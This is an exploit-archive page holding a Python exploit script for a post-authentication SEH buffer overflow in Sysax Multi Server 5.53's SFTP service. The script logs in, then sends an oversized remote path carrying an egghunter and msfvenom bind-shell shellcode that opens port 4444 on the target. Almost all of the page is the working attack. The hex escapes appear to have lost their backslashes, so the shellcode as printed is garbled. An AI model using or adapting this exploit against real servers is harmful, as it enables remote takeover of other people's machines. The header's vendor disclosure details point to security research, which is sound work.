Home / exploits Sysax Multi Server 5.53 SFTP Post Auth SEH Exploit
Posted on 28 February 2012
#!/usr/bin/python ########################################################################################################## #Title: Sysax Multi Server 5.53 SFTP Post Auth SEH Exploit (Egghunter) #Author: Craig Freyman (@cd1zz) #Tested on: XP SP3 32bit #Software Versions Tested: 5.53 #Date Discovered: Febrary 22, 2012 #Vendor Contacted: Febrary 23, 2012 #Vendor Response: February 27, 2012 #Vendor Fix: Version 5.55 #Notes: Offset based on home path length. This exploit works for C:AAAAAAAAAAAAAAAA #Complete Description: http://www.pwnag3.com/2012/02/sysax-multi-server-553-sftp-exploit.html ########################################################################################################## import paramiko,os,sys if len(sys.argv) != 5: print "[+] Usage: ./filename <Target IP> <Port> <User> <Password>" sys.exit(1) host = sys.argv[1] port = int(sys.argv[2]) username = sys.argv[3] password = sys.argv[4] transport = paramiko.Transport((host, port)) transport.connect(username = username, password = password) sftp = paramiko.SFTPClient.from_transport(transport) # msfvenom -p windows/shell_bind_tcp LPORT=4444 -b "x00" -e x86/shikata_ga_nai shell = ("DNWPDNWP" "xdbxd9xbaxf9x77x28x1bxd9x74x24xf4x5ex29xc9" "xb1x56x31x56x18x83xeexfcx03x56xedx95xddxe7" "xe5xd3x1ex18xf5x83x97xfdxc4x91xccx76x74x26" "x86xdbx74xcdxcaxcfx0fxa3xc2xe0xb8x0ex35xce" "x39xbfxf9x9cxf9xa1x85xdex2dx02xb7x10x20x43" "xf0x4dxcax11xa9x1ax78x86xdex5fx40xa7x30xd4" "xf8xdfx35x2bx8cx55x37x7cx3cxe1x7fx64x37xad" "x5fx95x94xadx9cxdcx91x06x56xdfx73x57x97xd1" "xbbx34xa6xddx36x44xeexdaxa8x33x04x19x55x44" "xdfx63x81xc1xc2xc4x42x71x27xf4x87xe4xacxfa" "x6cx62xeax1ex73xa7x80x1bxf8x46x47xaaxbax6c" "x43xf6x19x0cxd2x52xccx31x04x3axb1x97x4exa9" "xa6xaex0cxa6x0bx9dxaex36x03x96xddx04x8cx0c" "x4ax25x45x8bx8dx4ax7cx6bx01xb5x7ex8cx0bx72" "x2axdcx23x53x52xb7xb3x5cx87x18xe4xf2x77xd9" "x54xb3x27xb1xbex3cx18xa1xc0x96x2fxe5x0exc2" "x7cx82x72xf4x93x0exfax12xf9xbexaax8dx95x7c" "x89x05x02x7exfbx39x9bxe8xb3x57x1bx16x44x72" "x08xbbxecx15xdaxd7x28x07xddxfdx18x4exe6x96" "xd3x3exa5x07xe3x6ax5dxabx76xf1x9dxa2x6axae" "xcaxe3x5dxa7x9ex19xc7x11xbcxe3x91x5ax04x38" "x62x64x85xcdxdex42x95x0bxdexcexc1xc3x89x98" "xbfxa5x63x6bx69x7cxdfx25xfdxf9x13xf6x7bx06" "x7ex80x63xb7xd7xd5x9cx78xb0xd1xe5x64x20x1d" "x3cx2dx50x54x1cx04xf9x31xf5x14x64xc2x20x5a" "x91x41xc0x23x66x59xa1x26x22xddx5ax5bx3bx88" "x5cxc8x3cx99") egghunter = ( "x66x81xcaxffx0fx42x52x6ax02x58xcd" "x2ex3cx05x5ax74xefxb8x44x4ex57x50" "x8bxfaxafx75xeaxafx75xe7xffxe7") nseh = "x90x90xebx08" junk = "A" * 256 padding = "B" * (256 -len(junk) - len(shell)) seh = "xA1x47x92x5D" #5D9247A1 PPR RPCNS4.dll: *** SafeSEH unprotected *** remotepath = junk + nseh + seh + "x90" * 10 + egghunter + "x90" * 1000 + shell + "x90" * 100 localpath = '/tmp/system.log' print "============================================================================" print " Sysax Multi Server <= 5.53 SFTP Post Auth SEH Exploit (Egghunter) " print " by cd1zz " print " www.pwnag3.com " print " Launching exploit against " + host + " on port " + str(port) + " for XP" print "============================================================================" sftp.get(remotepath, localpath) sftp.close() transport.close()
